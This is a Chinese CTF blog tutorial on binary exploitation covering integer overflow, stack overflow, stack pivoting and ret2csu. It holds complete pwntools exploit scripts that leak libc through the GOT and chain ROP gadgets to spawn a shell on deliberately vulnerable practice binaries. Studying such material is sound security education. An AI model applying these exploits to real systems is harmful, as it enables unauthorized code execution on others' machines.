<!DOCTYPE html>
<html lang=zh-CN>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta name="description" content="">
    <meta name="keyword"  content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        pwn利用方法（一） - rot_will&#39;s Blog
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">
    <link href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
<meta name="generator" content="Hexo 6.2.0"></head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar ">
            <img src="/img/avatar.png" />
        </div>
        <div class="name">
            <i>rot_will</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li >
                <a href="/collect/">
                    <i class="iconfont icon-shoucang1"></i>
                    <span>收藏</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA"><span class="toc-text">整数溢出</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="toc-text">栈溢出</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%88%E8%BF%81%E7%A7%BB"><span class="toc-text">栈迁移</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%83%BD%E5%A4%9F%E8%A6%86%E7%9B%96ret"><span class="toc-text">能够覆盖ret</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E6%B3%95%E8%A6%86%E7%9B%96ret"><span class="toc-text">无法覆盖ret</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2csu"><span class="toc-text">ret2csu</span></a></li></ol></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        pwn利用方法（一）
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2022-05-07 09:00:00</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#ctf" title="ctf">ctf</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#pwn" title="pwn">pwn</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content no-indent">
        <h1 id="整数溢出"><a href="#整数溢出" class="headerlink" title="整数溢出"></a>整数溢出</h1><p>这是由于数据类型的使用不当产生的<br>如:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="type">int</span> a=<span class="number">0</span>;</span><br><span class="line">    <span class="type">char</span> c[<span class="number">10</span>]=<span class="string">&quot;&quot;</span>;</span><br><span class="line">    read(<span class="number">0</span>,c,<span class="number">5</span>);</span><br><span class="line">    <span class="keyword">if</span> (c[<span class="number">0</span>]==<span class="string">&#x27;-&#x27;</span>) &#123;</span><br><span class="line">        a=atoi(c);</span><br><span class="line">        <span class="keyword">if</span> (a&gt;=<span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (a&lt;<span class="number">10</span>) &#123;</span><br><span class="line">                system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在这个示例中，输入<code>4294967295</code>，是可以执行 <code>system(&quot;/bin/sh&quot;);</code> ，因为<code>a</code>是<code>int</code>类型，默认为<code>4字节有符号整型</code>，而<code>4294967295</code>的十六进制为 <code>0xffffffff</code>,刚好为<code>-1</code>的补码 ，所以实际a的值为<code>-1</code>, <code>-1&lt;0&lt;10</code>,所以可以绕过判断执行<code>system(&quot;/bin/sh&quot;);</code></p>
<h1 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h1><p>样例为<code>buuctf</code>中的<code>rip</code>题目</p>
<blockquote>
<p><strong>main函数代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E6%BA%A2%E5%87%BA.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main函数栈布局</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E6%BA%A2%E5%87%BA-1.jpg"></p>
</blockquote>
<blockquote>
<p><strong>函数调用过程</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E6%BA%A2%E5%87%BA-2.jpg"></p>
</blockquote>
<blockquote>
<p><strong>函数返回过程</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E6%BA%A2%E5%87%BA-3.png"><br>仅关于main函数及之后调用的函数</p>
</blockquote>
<pre><code>可以看出来程序在返回时会将栈中的数据赋值给`rbp`,`rip`寄存器, 一个是栈底寄存器，一个是指令指针寄存器(用于控制程序执行过程), 当我们在栈中的数据覆盖了`ret_addr`时，就可以控制程序执行过程, 使程序执行我们想要执行的.
</code></pre>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#程序中存在后门函数 (地址为0x401186)</span></span><br><span class="line"><span class="comment"># 0x401185 为 ret指令地址,(用于栈对齐)</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&quot;pwn1&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0xf</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0x401185</span>)+p64(<span class="number">0x401186</span>))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E6%BA%A2%E5%87%BA-4.png"></p>
<pre><code>因为在`system`函数中 执行了指令 `movaps xmmword ptr[rsp+0x50],xmm0`, 即 向 `rsp+0x50`的地址处写入 `128` 位的数据, 而 `movaps`指令需要对齐，所以`rsp+0x50`指向的地址就要与`128位`(`0x10字节`)对齐 ,但这里`rsp`指向的地址为`0x7ffc04f780a8`显然无法与`0x10`对齐, 所以在执行`system`函数时会导致程序中断, 虽然按照逻辑是可以获取shell的,但因为程序中断了,获取不了shell
</code></pre>
<h2 id="栈迁移"><a href="#栈迁移" class="headerlink" title="栈迁移"></a>栈迁移</h2><blockquote>
<p>当存在栈溢出，但溢出的数据较小时，可以尝试使用栈迁移</p>
</blockquote>
<p><a id="tran1"></a></p>
<h3 id="能够覆盖ret"><a href="#能够覆盖ret" class="headerlink" title="能够覆盖ret"></a>能够覆盖ret</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*样例代码*/</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="type">char</span> a[<span class="number">0x20</span>]=&#123;&#125;;</span><br><span class="line">    read(<span class="number">0</span>,a,<span class="number">0x30</span>);</span><br><span class="line">    write(<span class="number">1</span>,a,<span class="number">0x30</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>使用 gcc pwn_tran.c -fno-stack-protector -no-pie -o pwn_tran编译<br>在这个仅向栈中写入数据的例子中，数据的地址必须通过rbp计算得到</p>
</blockquote>
<blockquote>
<p><strong>main 函数代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main 函数栈布局</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB-1.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main 函数汇编代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB-2.jpg"><br>存在leave;ret 相当于 mov rsp,rbp;pop rbp;ret</p>
</blockquote>
<p>程序中不存在后门函数，那么想要获取<code>shell</code>, 就需要获取libc地址，通过栈迁移构造<code>system(&quot;/bin/sh&quot;);</code></p>
<p>exp思路为 将栈迁移到 got表附近通过write获取libc地址<br>然后将栈迁移到bss段中较高的地址处，执行system函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;pwn_tran&#x27;</span>)</span><br><span class="line">e=ELF(<span class="string">&#x27;&#x27;</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;libc-2.33.so&#x27;</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">leave=<span class="number">0x4011bd</span></span><br><span class="line">ret=<span class="number">0x4011be</span></span><br><span class="line">read=<span class="number">0x401182</span></span><br><span class="line">write=<span class="number">0x40119d</span></span><br><span class="line">bss=<span class="number">0x404048</span></span><br><span class="line">read_got=<span class="number">0x404020</span></span><br><span class="line">rdi=<span class="number">0x0000000000401223</span></span><br><span class="line">p.send(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(bss)+p64(read))</span><br><span class="line">p.read()</span><br><span class="line">payload=<span class="string">b&#x27;/bin/sh\x00&#x27;</span>+p64(bss+<span class="number">0x800</span>)+p64(read)+p64(bss-<span class="number">0x18</span>)+p64(bss-<span class="number">0x18</span>)+p64(write)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.read(<span class="number">0x40</span>)</span><br><span class="line">read_addr=u64(p.read(<span class="number">8</span>))</span><br><span class="line">libc.address=read_addr-libc.sym[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc.address))</span><br><span class="line">system=libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh=<span class="built_in">next</span>(libc.search(<span class="string">b&quot;/bin/sh&quot;</span>))</span><br><span class="line">bss=bss+<span class="number">0x700</span></span><br><span class="line">payload=p64(bss+<span class="number">0x200</span>)+p64(rdi)+p64(bin_sh)+p64(system)+p64(bss+<span class="number">0x100</span>-<span class="number">0x20</span>)+p64(leave)</span><br><span class="line"><span class="comment"># 在调用system时不能使用上面在bss段中设置的/bin/sh作为参数 ,因为他在调用write函数时被修改了</span></span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="无法覆盖ret"><a href="#无法覆盖ret" class="headerlink" title="无法覆盖ret"></a>无法覆盖ret</h3><blockquote>
<p>使用 gcc pwn_tran.c -fno-stack-protector -no-pie -o pwn_tran编译</p>
</blockquote>
<blockquote>
<p><strong>main 函数代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB1.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main 函数栈布局</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB1-1.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main 函数汇编代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB1-2.jpg"></p>
</blockquote>
<blockquote>
<p><strong>func 函数代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB1-3.jpg"></p>
</blockquote>
<blockquote>
<p><strong>func 函数栈布局</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB1-4.jpg"></p>
</blockquote>
<blockquote>
<p><strong>func 函数汇编代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB1-5.jpg"></p>
</blockquote>
<p>就我现在的认知来说，当栈溢出只能修改<code>rbp</code>时，至少需要在返回时连续执行两次<code>leave</code>，才可能控制程序<br>·如果在函数返回后，不存在对向栈中写入数据的操作，则需要用户在迁移前向一块地址已知的区域写入数据，否则就无法控制程序流<br>·如果在函数返回后，存在向栈中写入数据的操作(写入数据地址通过rbp计算)，那么依旧可以控制程序流</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">b_add=<span class="number">0x404060</span></span><br><span class="line">read_got=<span class="number">0x404020</span></span><br><span class="line">read=<span class="number">0x401182</span></span><br><span class="line">write_plt=<span class="number">0x401050</span></span><br><span class="line">read_plt=<span class="number">0x401060</span></span><br><span class="line">rdi=<span class="number">0x401263</span></span><br><span class="line">rsi_15=<span class="number">0x401261</span></span><br><span class="line">leave=<span class="number">0x4011d4</span></span><br><span class="line"></span><br><span class="line">e=ELF(<span class="string">&#x27;./pwn_tran&#x27;</span>,checksec=<span class="number">0</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;libc-2.33.so&#x27;</span>,checksec=<span class="number">0</span>)</span><br><span class="line">p=process(<span class="string">&#x27;pwn_tran&#x27;</span>)</span><br><span class="line">p.send(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(b_add))</span><br><span class="line">p.sendline(p64(b_add+<span class="number">0x50</span>)+p64(rdi)+p64(<span class="number">1</span>)+p64(rsi_15)+p64(read_got)+p64(<span class="number">0</span>)+p64(write_plt)+p64(read))</span><br><span class="line">p.read(<span class="number">0x60</span>)</span><br><span class="line">d=u64(p.read(<span class="number">8</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(d))</span><br><span class="line">libc.address=d-libc.sym[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">system=libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh=<span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">p.sendline(<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=p64(b_add+<span class="number">0x808</span>)+p64(rdi)+p64(<span class="number">0</span>)+p64(rsi_15)+p64(b_add+<span class="number">0x808</span>)+p64(<span class="number">0</span>)+p64(read_plt)+p64(leave)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(b_add)+p64(leave)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">p.send(payload)</span><br><span class="line">p.send(p64(b_add+<span class="number">0x900</span>)+p64(rdi)+p64(bin_sh)+p64(system))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="ret2csu"><a href="#ret2csu" class="headerlink" title="ret2csu"></a>ret2csu</h2><p>当在执行某些函数或系统调用时需要设置 <code>rdi,rsi,rdx</code> 寄存器时，可以使用<code>ret2csu</code>方法设置寄存器<br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-csu.jpg"></p>
<p>利用下半段指令控制寄存器，利用上半段指令设置<code>rdi,rsi,rdx</code>寄存器，并执行指定地址储存的函数地址(也可以是指令地址)，函数或指令的地址通过 <code>r15+rbx*8</code> 获取,所以需要先在已知地址处写入函数或指令的地址(也可以是got表中的成员)<br>在控制寄存器时一般设置 <code>rbx=0,rbp=1</code> 这样可以跳出上半段的循环，设置<code>r15</code>为函数地址的二级指针，设置<code>r12</code>为<code>rdi</code>的值(仅支持4字节)，<code>r13</code>为<code>rsi</code>的值，<code>r14</code>为<code>rdx</code>的值，就将64位程序的前三个参数设置好了</p>
<blockquote>
<p>在我的理解中，<code>ret2csu</code>就是用来修改 <code>rdx</code>寄存器的值，因为存在<code>__libc_csu_init</code>函数就存在 <code>pop rdi</code> 与 <code>pop rsi;pop r15</code>指令 ，这样就解决了前两个参数，而<code>pop rdx</code>指令一般不存在，所以需要利用<code>ret2csu</code>设置</p>
</blockquote>
<p>仅在64位程序中使用，因为64位程序使用寄存器传参，而32位程序的参数储存在栈中</p>
<p>这里的示例为 <a href="#tran1">栈迁移的第一个示例</a></p>
<blockquote>
<p><strong>main 函数代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main 函数栈布局</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB-1.jpg"></p>
</blockquote>
<blockquote>
<p><strong>main 函数汇编代码</strong><br><img src="https://raw.githubusercontent.com/rot-will/Blot-s-pic/main/pwn-%E6%A0%88-%E8%BF%81%E7%A7%BB-2.jpg"></p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;pwn_csu&#x27;</span>)</span><br><span class="line">e=ELF(<span class="string">&#x27;pwn_csu&#x27;</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;libc-2.33.so&#x27;</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">leave=<span class="number">0x4011bd</span></span><br><span class="line">ret=<span class="number">0x4011be</span></span><br><span class="line">read=<span class="number">0x401182</span></span><br><span class="line">read_plt=e.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">write_plt=e.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">read_got=<span class="number">0x404020</span></span><br><span class="line">rdi=<span class="number">0x0000000000401223</span></span><br><span class="line">rsi=<span class="number">0x0000000000401221</span></span><br><span class="line">pops=<span class="number">0x40121a</span></span><br><span class="line">call=<span class="number">0x401200</span></span><br><span class="line">bss=e.bss(<span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(bss)+p64(read))</span><br><span class="line">p.read()</span><br><span class="line">payload=<span class="string">b&quot;/bin/sh\x00&quot;</span>+p64(pops)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(<span class="number">0</span>)+p64(bss+<span class="number">0x800</span>)+p64(<span class="number">0x300</span>)+p64(read_got)+\</span><br><span class="line">        p64(call)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(bss+<span class="number">0x800</span>)+p64(<span class="number">0</span>)*<span class="number">4</span>+p64(leave)</span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> i&lt;<span class="built_in">len</span>(payload):</span><br><span class="line">    p.send(payload[i:i+<span class="number">0x10</span>].ljust(<span class="number">0x10</span>,<span class="string">b&#x27;\x00&#x27;</span>)+p64(<span class="number">0x40119d</span>)*<span class="number">2</span> + p64(bss+i+<span class="number">0x10</span>)+p64(read))</span><br><span class="line">    p.read()</span><br><span class="line">    i=i+<span class="number">0x10</span>  </span><br><span class="line">  <span class="comment"># 这里的用例主要是利用 ret2csu设置rdx，然后就可以输入输出较长的数据</span></span><br><span class="line">  <span class="comment"># 就可以一次性将payload全部输入</span></span><br><span class="line"></span><br><span class="line">  <span class="comment"># 写到这里的时候发现，这个例子并不需要ret2csu , 通过多次输入就可以构造出一个足够大的payload，不需要修改rdx寄存器的值来让我们输入输出较长的数据</span></span><br><span class="line"></span><br><span class="line">payload=p64(<span class="number">0</span>)*<span class="number">2</span>+p64(<span class="number">0x40119d</span>)*<span class="number">2</span>+p64(bss-<span class="number">0x20</span>)+p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.read()</span><br><span class="line">payload=p64(bss+<span class="number">0x600</span>)+p64(rdi)+p64(<span class="number">1</span>)+p64(rsi)+p64(read_got)+p64(<span class="number">0</span>)+p64(write_plt)+p64(rdi)+p64(<span class="number">0</span>)+p64(rsi)+p64(bss+<span class="number">0x600</span>)+p64(<span class="number">0</span>)+p64(read_plt)+p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line">d=u64(p.read(<span class="number">8</span>))</span><br><span class="line">p.read()</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(d))</span><br><span class="line">libc.address=d-libc.sym[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">system=libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh=bss-<span class="number">0x20</span></span><br><span class="line"></span><br><span class="line">payload=p64(bss+<span class="number">0x900</span>)+p64(rdi)+p64(bin_sh)+p64(system)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        
        <li>
            <a target="_blank"  href="https://github.com/rot-will">
                            <span class="fa-stack fa-lg">
                                <i class="iconfont icon-github"></i>
                            </span>
            </a>
        </li>
        

        
        
        
        <li>
            <a target="_blank"  href="tencent://message/?Site=admin5.com&menu=yes&uin=2127361651">
                            <span class="fa-stack fa-lg">
                                <i class="iconfont icon-qq-fill"></i>
                            </span>
            </a>
        </li>
        
        

    </ul>
    
    <p>
        <span>/</span>
        
        <span><a target="_blank" rel="noopener" href="https://www.lewiserii.top">lewiserii</a></span>
        <span>/</span>
        
    </p>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>  Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.json"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




    <script src="https://giscus.app/client.js"
  data-repo="rot-will/rot-will.github.io"
  data-repo-id="R_kgDOHgxmbg"
  data-category="Announcements"
  data-category-id="DIC_kwDOHgxmbs4CPuLX"
  data-mapping="url"
  data-reactions-enabled="1"
  data-emit-metadata="0"
  data-input-position="bottom"
  data-theme="light"
  data-lang="zh-CN"
  crossorigin="anonymous"
  async>
</script>




</html>
